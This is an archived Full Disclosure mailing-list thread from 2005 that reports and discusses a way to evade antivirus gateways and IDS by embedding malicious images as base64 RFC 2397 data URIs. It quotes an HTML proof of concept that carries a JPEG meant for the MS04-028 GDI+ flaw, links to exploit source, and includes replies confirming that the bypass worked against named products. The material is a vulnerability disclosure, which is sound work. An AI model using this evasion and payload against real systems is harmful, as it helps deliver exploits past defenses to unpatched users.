Full Disclosure mailing list archives
Re: Multi-vendor AV gateway image inspection bypass vulnerability
From: Steven Rakick <stevenrakick () yahoo com>
Date: Tue, 11 Jan 2005 18:56:00 -0800 (PST)
At this point I have no choice by to agree. So far I've had an opportunity to test this with Check Point Interspect and McAfee IntruShield. Like you said, (in my lab) both detected and block the malicious image when it was formatted without RFC 2397, but when base64 encoded they were downloaded and excuted there attack. Basically it's looking like no security companies are looking at data formatted in this fashion. I'm not sure but it seems like you can probably transfer anything you'd like by just changing the content type and your anti-virus, IDS, application firewall or whatever you're using at the network level would be completely oblivious. On Tue, 11 Jan 2005 14:58:43 -0500, Darren Bounds <lists () intrusense com> wrote:
Hello Danny, This vulnerability is only applicable to the HTTP
data while in
transit. Once received by the client the image will
be rendered and
subsequently detected if local AV software. At the present time, I'm not aware of any AV, IDS or
IPS vendor that
will detect malicious images imbedded in HTML in
this manner.
Thank you, Darren Bounds Intrusense, LLC. -- Intrusense - Securing Business As Usual On Jan 11, 2005, at 2:14 PM, Danny wrote:On Mon, 10 Jan 2005 14:08:11 -0500, Darren Bounds <dbounds () intrusense com> wrote:-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multi-vendor AV gateway image inspection bypass
vulnerability
January 10, 2005 A vulnerability has been discovered which allows
a remote attacker to
bypass anti-virus (as well other security technologies such as IDS
and IPS) inspection
of HTTP image content. By leveraging techniques described in RFC 2397
for base64 encoding
image content within the URL scheme. A remote attack may encode a
malicious image within
the body of an HTML formatted document to circumvent content
inspection.
For example:
http://www.k-otik.com/exploits/09222004.ms04-28-cmd.c.php
The source code at the URL above will by default
create a JPEG image
that will attempt (and fail without tweaking) to exploit the Microsoft
MS04-028 GDI+
vulnerability. The image itself is detected by all AV gateway engines tested (Trend, Sophos
and McAfee), however,
when the same image is base64 encoded using the technique described
in RFC 2397
(documented below), inspection is not performed and is delivered rendered by the
client.
While Microsoft Internet Explorer does not
support the RFC 2397 URL
scheme; Firefox, Safari, Mozilla and Opera do and will render the data and
thus successfully
execute the payload if the necessary OS and/or application patches have not been
applied.
## BEGIN HTML ## <html> <body> <img
src="data:image/gif;base64,/9j/4AAQSkZJRgABAQEAYABgAAD//
gAARXhpZgAASUkqAAgAHPD9f0FBQUGWAgAAGgAAABzw /
X9BQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUF
B
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU
FB
QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQQAAAP/
bAEMACAYGBwYFCAcHBwkJ
CAoMFA0MCwsMGRITDxQdGh8eHRocHCAkLicgIiwjHBwoNyksMDE0NDQfJzk9ODI8LjM0Mv
/b
AEMBCQkJDAsMGA0NGDIhHCEyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
Iy MjIyMjIyMjIyMjIyMv/AABEIAAMAAwMBIgACEQEDEQH/ xAAfAAABBQEBAQEBAQAAAAAAAAAA AQIDBAUGBwgJCgv/
xAC1EAACAQMDAgQDBQUEBAAAAX0BAgMABBEFEiExQQYTUWEHInEUMoGR
oQgjQrHBFVLR8CQzYnKCCQoWFxgZGiUmJygpKjQ1Njc4OTpDREVGR0hJSlNUVVZXWFlaY2
Rl
ZmdoaWpzdHV2d3h5eoOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExc
bH yMnK0tPU1dbX2Nna4eLj5OXm5+jp6vHy8/T19vf4+fr/ xAAfAQADAQEBAQEBAQEBAAAAAAAA AQIDBAUGBwgJCgv/
xAC1EQACAQIEBAMEBwUEBAABAncAAQIDEQQFITEGEkFRB2FxEyIygQgU
QpGhscEJIzNS8BVictEKFiQ04SXxFxgZGiYnKCkqNTY3ODk6Q0RFRkdISUpTVFVWV1hZWm
Nk
ZWZnaGlqc3R1dnd4eXqCg4SFhoeIiYqSk5SVlpeYmZqio6Slpqeoqaqys7S1tre4ubrCw8
TF
xsfIycrS09TV1tfY2dri4+Tl5ufo6ery8/T19vf4+fr/2gAMAwEAAhEDEQA/
APn+iiigD// Z"> </body> </html> ## END HTML ## Solution: While AV vendor patches are not yet available,
fixes for all currently
known image vulnerabilities are and have been for several months. If you have
not yet applied them,
you have your own negligence to blame. Contributions: Thanks to Scott Roeder and Jacinto Rodriquez
their assistance in
platform testing.I believe TrendMicro's OfficeScan (client-server
scanner) will catch
it, but I am not sure about their gateway device.
What was their
response? ...D_______________________________________________ Full-Disclosure - We believe in it. Charter:
http://lists.netsys.com/full-disclosure-charter.html
===== __________________________________________________ Do You Yahoo!? Tired of spam? Yahoo! Mail has the best spam protection around http://mail.yahoo.com _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 10)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Jeff Gillian (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability - KMail Noam Rathaus (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Danny (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Darren Bounds (Jan 11)
- <Possible follow-ups>
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 11)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Nils Ketelsen (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Steven Rakick (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Frank Knobbe (Jan 12)
- Re: Multi-vendor AV gateway image inspection bypass vulnerability Jeff Gillian (Jan 11)